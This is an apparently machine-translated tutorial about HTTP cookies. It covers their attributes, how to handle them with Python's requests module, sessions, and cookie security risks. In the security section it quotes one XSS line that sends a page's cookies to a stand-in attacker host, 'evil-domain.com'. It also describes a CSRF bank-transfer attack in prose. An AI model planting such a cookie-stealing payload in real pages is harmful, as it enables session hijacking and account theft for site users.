In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >
Share
Shulou(Shulou.com)06/02 Report--
In this issue, the editor will bring you what are the Cookie knowledge points about Python. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.
I believe that many students must have heard of Cookie and probably understand its function, but its principle and how to set it up may not be very clear to students who have not done web. In fact, they have mentioned it to you in previous Python learning tutorials, so today we will take you to learn more about Cookie!
I. background of birth
In the first of a series of crawler tutorials, we talked about the five features of HTTP in HTTP, and one of them is statelessness.
HTTP stateless: the server cannot know whether two requests are from the same browser, that is, the server does not know what the user did last time, and each request is completely independent of each other.
In the early days, the Internet was used for simple browsing of document information, yellow pages, portals, and so on. There was no such thing as interaction. But with the slow development of the Internet, broadband, servers and other hardware facilities have been greatly improved, the Internet allows people to do more things, so interactive Web is slowly rising, while the stateless characteristics of HTTP seriously hinder its development!
Interactive Web: the client can interact with the server, such as user login, purchasing goods, various forums, etc.
What if you can't record what the user did last time? Smart programmers began to think: how can we record the user's last operation information? So someone thought of the hidden domain.
Hidden field writing:
This puts the record of the user's last action in the input of the form form, so that when you submit the form when you request, you will not know what the user did last time, but you have to create a hidden field every time and have to assign values that are too troublesome and error-prone!
Ps: hidden domain plays a powerful role, and today many people are using it to solve all kinds of problems!
Lou Montulli (Lu-Monterey), an employee of Netscape at that time, applied the concept of "cookies" to network communications in 1994 to solve the shopping cart history of users' online shopping. At that time, the most powerful browser was Netscape browser. With the support of Netscape browser, other browsers gradually began to support Cookie, and so far all browsers support Cookie.
What is Cookie?
We already know that Cookie was born to solve the problem that HTTP's stateless feature can't satisfy interactive web, so what is it?
The picture above is the Cookies (plural form of Cookie) on the home page of Baidu in the Chrome browser. In the table, each row represents a Cookie, so let's take a look at the definition of Cookie.
Cookie is the special information sent by the server to the client, and this information is stored in the client in the form of a text file, and then the client will take these special information with it every time it sends a request to the server, which is used by the server to record the status of the client.
Cookie is mainly used in the following three aspects:
Session state management (such as user login status, shopping cart, game scores, or other information that needs to be recorded)
Personalized settings (such as user-defined settings, themes, etc.)
Browser behavior tracking (such as tracking and analyzing user behavior, etc.)
III. Cookie principle
We have learned that Cookie is a process in which the server sends out special information stored in the browser. In order to make it easier for everyone to understand, Brother Pig drew a Cookie schematic diagram for you by taking user login as an example.
After the user enters the user name and password, the browser sends the user name and password to the server, and the server verifies it. After the verification, the user information is encrypted and encapsulated as Cookie, which is returned to the browser in the request header.
HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Tue, 15 Aug 2019 21:47:38 GMT; Path=/; Domain=.169it.com; HttpOnly [Responder]
When the browser receives the data returned by the server, it finds that there is a Set-Cookie in the request header, and then it saves the Cookie. The next time the browser requests the server, it will also pass the Cookie in the request header to the server:
GET / sample_page.html HTTP/1.1Host: www.example.orgCookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg
After receiving the request, the server gets the cookie from the request header, and then parses and receives the user information, indicating that the user is logged in, and Cookie saves the data on the client.
Here we can see that the user information is saved in the Cookie, which is equivalent to saving in the browser, that is to say, the user can modify the user information at will, which is an insecure policy!
Emphasize one point: whether the Cookie is sent to the browser by the server or to the server by the browser, it is put in the request header!
IV. Cookie attribute
In the following figure, we can see that a Cookie has attributes such as Name, Value, Domain, Path, Expires/Max-Age, Size, HTTP, and Secure, so what are the functions of these attributes? Let's take a look.
1. Name&Value
Name represents the name of the Cookie, and the server acquires a cookie value through the name property.
Value represents the value of Cookie, and in most cases the server will use this value as a key to query the saved data.
2.Domain&Path
Domain indicates that you can access the domain name of this cookie. In the following figure, we use the Cookie on the Baidu Tieba page to explain the Domain attribute.
From the above picture, we can see that domain has: .baidu.com top-level domain name and .teiba.baidu.com second-level domain name, so there will be an access rule: top-level domain name can only set or access top-level domain Cookie, second-level and lower domain names can only access or set their own or top-level domain Cookie, so if you want to share Cookie among multiple second-level domain names, you can only set the Domain attribute to top-level domain name!
Path indicates the page path where you can access this cookie. For example, path=/test, only pages under the / test path can read this cookie.
3.Expires/Max-Age
Expires/Max-Age represents this cookie timeout. If its value is set to a time, the cookie becomes invalid when this time is reached. If it is not set, the default value is Session, which means that cookie will fail together with session. This cookie becomes invalid when the browser is closed (not the browser tab, but the entire browser).
Tip: when the expiration time of Cookie is set, the date and time set is only related to the client, not the server.
4.Size
Size represents the number of characters of the name+value of the Cookie, for example, if there is a Cookie:id=666, then Size=2+3=5.
In addition, each browser has different support for Cookie
5.HTTP
HTTP represents the httponly attribute of cookie. If this property is true, the information about this cookie will only be in the http request header, and the cookie cannot be accessed through [xss_clean].
This feature is designed to provide a security measure to help prevent cross-site scripting attacks (XSS) through Javascript from stealing cookie
6.Secure
Secure indicates whether this cookie can only be passed through https. Unlike other options, this option is just a tag and has no other values.
The content of this cookie means that it is of high value and may be potentially cracked and transmitted in plain text.
5. Python operates Cookie
1. Generate Cookie
As we said earlier, Cookie is generated by the server, so how to generate it with Python code?
From the login code in the figure above, we can see that after simply verifying the user name and password, the server jumps to / user, then set a cookie, and the browser receives the response and finds that there is a request header: Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg, and then the browser will save the Cookie!
two。 Get Cookie
Recently we've been talking about the requests module, so here we use the requests module to get the Cookie.
R.cookies means getting all the cookie,get_dict () functions means that the dictionary format cookie is returned.
3. Set up Cookie
In the last article when we climbed Youku's on-screen comment, we used the requests module to set up Cookie.
We put the Cookie copied by the browser in the code, so that we can successfully disguise it as a browser, and then crawl data normally. Copying Cookie is a common means in crawlers!
VI. Session
1. Birth background
In fact, at the beginning of Cookie design, unlike Brother Pig, Cookie only saves a key, but saves user information directly. At first, we think it is cool to use it, but because cookie exists on the user side, and its own storage size is limited, the most important thing is that users can be visible and can be modified at will, which is very unsafe. So how to be safe and convenient to read information globally? So, at this time, a new save session mechanism, Session, was born.
What is 2.Session?
Session is translated into a session, and the server creates a session object for each browser. When the browser first requests the server, the server generates a Session object for the browser, saves it on the server, and sends the Id of the Session to the client in the form of cookie, ending with the user explicitly ending or the session timeout.
Let's take a look at how Session works:
When a user sends the first request to the server, the server establishes a session for it and creates an identification number (sessionID) for this session.
All subsequent requests by this user should include this identification number (sessionID). The server proofs the identification number to determine which session the request belongs to.
For session identification number (sessionID), there are two ways to implement it: Cookie and URL rewriting. Brother Pig draws a Session schematic diagram in the way of Cookie.
Contact cookie schematic we can see, Cookie is to save the data directly in the client, while Session is to save the data in the server, Session is better in terms of security!
3.Python operation Session
Later, Brother Pig will use the login example to explain how to manipulate Session with Python code.
VII. Interview scene
The relationship between 1.Cookie and Session
It is all produced in order to realize the interaction between the client and the server.
Cookie is stored on the client side, and its shortcomings are easy to forge and unsafe.
Session is stored on the server side and consumes server resources.
There are two ways to implement Session: Cookie and URL rewriting
Security problems caused by 2.Cookie
Session hijacking and XSS: in Web applications, Cookie is often used to mark users or authorize sessions. Therefore, if the Cookie of the Web application is stolen, the session of the authorized user may be attacked. The common methods to steal Cookie are social engineering attacks and XSS attacks by exploiting application vulnerabilities. (new Image ()). Src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + [xss_clean]; Cookie of type HttpOnly can mitigate such attacks to some extent because it blocks the accessibility of JavaScript.
Cross-site request forgery (CSRF): Wikipedia has given a good example of CSRF. For example, a picture on an insecure chat room or forum is actually a request to withdraw cash to your bank server:
When you open the HTML page containing this image, if you have previously logged in to your bank account and the Cookie is still valid (there are no other verification steps), the money in your bank will probably be transferred automatically. The solutions to CSRF include: hidden domain verification code, confirmation mechanism, short Cookie life cycle, etc.
VIII. Summary
Today, I explained the relevant knowledge of Cookie and how to use the requests module to operate Cookie. Finally, I mentioned the relationship between Cookie and Session and what security problems exist in Cookie.
These are the Cookie knowledge points of Python shared by the editor. If you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.